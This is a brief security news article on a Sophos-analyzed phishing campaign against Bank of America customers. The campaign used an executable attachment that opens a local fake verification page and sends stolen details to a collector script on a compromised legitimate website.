14 DAY TRIAL // A new phishing attack targeting Bank of America customers spreads a trojan that opens a local spoofed page asking for personal and banking details.
The attack, analyzed by security researchers from Sophos, generates email purporting to come from Bank of America and urging users to verify their billing information.
Unlike traditional phishing emails which advertise a link to a spoofed page, or at least have an attached HTML document, this attack opted for an attachment called BillingVerification.exe.
This is unusual, because .exe files present in email messages are much more easier to detect by anti-spam filters and antivirus programs than rogue links.
Nevertheless, the executable is a self-extracting archive that drops a file under C:\bankofamerica\verification\BillingVerification.html and opens it with the default browser.
The local HTML displays a fake Bank of America account verification page which contains a form for inputting personal information, as well as account and online banking details.
Fraser Howard, a principal virus researcher at SophosLabs, points out that one interesting aspect of this attack is the fact that it sends the information to a collector script hosted on a compromised legit website.
Furthermore, since the directory where the script is located was left unprotected, anyone can go in and copy the cache of stolen information.
"And there it is, a warning to us all. Even the lamest of attacks will often find success, tricking unwitting recipients into falling for the social engineering. The result is that they risk infecting themselves, as well as giving away sensitive data," Mr. Howard notes.
The use of compromised legit websites in online attacks has become increasingly common, because it is convenient for cybercriminal. First of all, it keeps operational costs down, removing the need to register new domains all the time because security researchers close them down.
Second, a legit website cannot be closed down as easily since the owner might loose business because of it. Trying to establish contact with the webmasters and convincing them to solve the problems is usually the only option for researchers, one that is very inefficient in practice.